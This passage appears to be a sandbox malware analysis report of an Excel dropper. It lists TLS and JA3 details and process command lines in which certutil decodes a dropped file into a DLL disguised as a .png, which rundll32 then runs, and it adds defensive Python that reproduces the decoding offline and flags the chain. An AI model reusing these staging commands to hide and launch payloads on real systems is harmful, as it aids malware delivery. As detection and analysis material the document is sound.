Not After (intermediate):Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint:771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest:37f463bf4616ecd445d4a1937da06e19

Timestamp:Jan 20, 2021 14:03:07.117407084 CET
Source IP:87.248.100.215
Source Port:443
Dest IP:192.168.2.3
Dest Port:49709
Subject (leaf):CN=*.www.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US
Issuer (leaf):CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before (leaf):Thu Oct 08 02:00:00 CEST 2020
Not After (leaf):Wed Mar 31 14:00:00 CEST 2021
Subject (intermediate):CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer (intermediate):CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before (intermediate):Tue Oct 22 14:00:00 CEST 2013
Not After (intermediate):Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint:771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest:37f463bf4616ecd445d4a1937da06e19
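Both HTTPS rows carry the same JA3 fingerprint string and digest. JA3 concatenates five ClientHello fields (TLS version, cipher suites, extensions, supported groups, EC point formats, with GREASE values removed), and the digest is by definition the MD5 of that string, so the digest column can be recomputed from the fingerprint column. The Python below is an added example, not part of the sandbox report, that parses the fingerprint from the table, names its fields, rebuilds the string from raw ClientHello values with GREASE filtering, and recomputes the digest. The extension names are the IANA registry names for the numbers listed; the GREASE set follows RFC 8701.

```python
import hashlib

# Fingerprint and digest columns copied from the HTTPS Packets table above.
JA3_STRING = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
JA3_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

# GREASE values (RFC 8701: 0x0A0A, 0x1A1A, ..., 0xFAFA) are never part of a JA3 string.
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}
# IANA TLS extension registry names for the numbers seen in this report.
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              13: "signature_algorithms", 23: "extended_master_secret",
              35: "session_ticket", 65281: "renegotiation_info"}


def parse_ja3(s: str) -> dict:
    """Split a JA3 string into its five ClientHello fields as integer lists."""
    version, ciphers, exts, curves, fmts = s.split(",")

    def ints(field: str) -> list:
        return [int(x) for x in field.split("-")] if field else []

    return {"version": int(version), "ciphers": ints(ciphers), "extensions": ints(exts),
            "curves": ints(curves), "point_formats": ints(fmts)}


def tls_version_name(v: int) -> str:
    return TLS_VERSIONS.get(v, f"unknown({v})")


def extension_names(ext_ids) -> list:
    return [EXTENSIONS.get(e, f"ext_{e}") for e in ext_ids]


def ja3_string(version, ciphers, extensions, curves, point_formats) -> str:
    """Build the JA3 string from raw ClientHello values, dropping GREASE entries
    (they are randomised per connection and would make the hash unstable)."""
    def join(values) -> str:
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([str(version), join(ciphers), join(extensions),
                     join(curves), join(point_formats)])


def ja3_digest(s: str) -> str:
    """The JA3 digest column is, by definition, the MD5 of the JA3 string."""
    return hashlib.md5(s.encode("ascii")).hexdigest()


if __name__ == "__main__":
    fields = parse_ja3(JA3_STRING)
    print(tls_version_name(fields["version"]), len(fields["ciphers"]), "cipher suites offered")
    print("extensions:", extension_names(fields["extensions"]))
    print("recomputed digest matches table:", ja3_digest(JA3_STRING) == JA3_DIGEST)
```

The identical digest on both rows means the same TLS client stack sent both ClientHellos; a JA3 match identifies the stack (here the Windows TLS implementation used by whatever process opened the socket), not the malware itself, so it is only useful as a pivot when paired with the process that owned the connection.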

                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:48
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                          Imagebase:0x2e0000
                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:53
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
                                                                                                                                                                                                          Imagebase:0xc10000
                                                                                                                                                                                                          File size:1273856 bytes
                                                                                                                                                                                                          MD5 hash:D056DF596F6E02A36841E69872AEF7BD
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:53
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:57
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
                                                                                                                                                                                                          Imagebase:0xc10000
                                                                                                                                                                                                          File size:1273856 bytes
                                                                                                                                                                                                          MD5 hash:D056DF596F6E02A36841E69872AEF7BD
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:57
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:03:01
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:03:07
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline: C:\ProgramData\ioq\ioq.dll,DllRegisterServer
                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
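The process records above describe one staging chain: a text file already present under C:\Users\Public (94101.txt) is turned into hex text by certutil -decode (94101.png2), that hex text is turned into a PE by certutil -decodehex (94101.png), rundll32 loads the PE by export name (In) despite its image extension, and a second rundll32 instance runs C:\ProgramData\ioq\ioq.dll through DllRegisterServer. The Python below is an added example, not part of the sandbox report or of the sample, that reproduces the two certutil stages offline on a constructed stand-in payload and runs the detection checks an analyst would derive from these command lines: an Office parent spawning a LOLBin, certutil decode switches, and rundll32 loading a module without a .dll extension or from a user-writable path. The process records are constructed from the command lines shown; their parent pids (Excel spawning the LOLBins, the first rundll32 spawning the second) and the simplified certutil model (plain hex input only, while real certutil -decodehex also accepts its own dump format) are assumptions.

```python
import base64
import re

# Constructed stand-in for the dropped payload: a DOS header whose e_lfanew points
# at a "PE\0\0" signature, then filler. It is NOT the sample's DLL.
FAKE_PE = b"MZ\x90\x00" + bytes(56) + b"\x40\x00\x00\x00" + b"PE\x00\x00" + bytes(20)


def encode_like_macro(pe: bytes) -> str:
    """Stage 0 (the dropper's side): hex text of the PE, then base64 of that text.
    This is the layering the two certutil calls in the report undo in reverse."""
    return base64.b64encode(pe.hex().encode("ascii")).decode("ascii")


def certutil_decode(text: str) -> bytes:
    """Stage 1, equivalent of 'certutil -decode in out': base64 text -> raw bytes.
    PEM-style BEGIN/END lines are skipped, as certutil does."""
    body = "".join(line.strip() for line in text.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def certutil_decodehex(hex_text: bytes) -> bytes:
    """Stage 2, equivalent of 'certutil -decodehex in out' for plain hex input:
    drop whitespace, decode hex digit pairs -> raw bytes (assumed model)."""
    return bytes.fromhex(re.sub(rb"\s+", b"", hex_text).decode("ascii"))


def recover_payload(dropped_text: str) -> bytes:
    """Run both stages exactly as the two certutil processes did."""
    return certutil_decodehex(certutil_decode(dropped_text))


def is_pe(data: bytes) -> bool:
    """Content check that ignores the file extension: MZ header and PE signature."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed process-creation records mirroring the command lines in the report.
# pid/ppid values are assumptions, not taken from the report.
PROCESSES = [
    {"pid": 1, "ppid": 0, "image": "EXCEL.EXE",
     "cmd": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2, "ppid": 1, "image": "certutil.exe",
     "cmd": r"'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2"},
    {"pid": 3, "ppid": 1, "image": "certutil.exe",
     "cmd": r"'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png"},
    {"pid": 4, "ppid": 1, "image": "rundll32.exe",
     "cmd": r"'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In"},
    {"pid": 5, "ppid": 4, "image": "rundll32.exe",
     "cmd": r" C:\ProgramData\ioq\ioq.dll,DllRegisterServer"},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "cmd.exe", "powershell.exe"}
USER_WRITABLE = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp")
CERTUTIL_DECODE = re.compile(r"\s-(decode|decodehex|urlcache|verifyctl)\b", re.I)
RUNDLL_MODULE = re.compile(r"(\S+\.(\w+)),\w+")  # "<module path>,<export>"


def findings(procs: list) -> list:
    """Return (pid, rule) pairs for the behaviours this chain exhibits."""
    by_pid = {p["pid"]: p for p in procs}
    out = []
    for p in procs:
        img = p["image"].lower()
        parent = by_pid.get(p["ppid"])
        if parent and parent["image"].lower() in OFFICE and img in LOLBINS:
            out.append((p["pid"], "office_spawns_lolbin"))
        if img == "certutil.exe" and CERTUTIL_DECODE.search(p["cmd"]):
            out.append((p["pid"], "certutil_decode"))
        if img == "rundll32.exe":
            m = RUNDLL_MODULE.search(p["cmd"])
            if m:
                module, ext = m.group(1).lower(), m.group(2).lower()
                if ext != "dll":
                    out.append((p["pid"], "rundll32_non_dll_module"))
                if module.startswith(USER_WRITABLE):
                    out.append((p["pid"], "rundll32_writable_path"))
    return out


if __name__ == "__main__":
    staged = encode_like_macro(FAKE_PE)
    print("recovered PE:", is_pe(recover_payload(staged)))
    for pid, rule in findings(PROCESSES):
        print(pid, rule)
```

The extension check is the reason the report flags "files with a non-matching file extension": the staged file is named .png but its content is a PE, so detection has to look at the bytes (or at the rundll32 command line) rather than the name. The writable-path check catches the second rundll32 invocation, whose module does carry a .dll extension.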
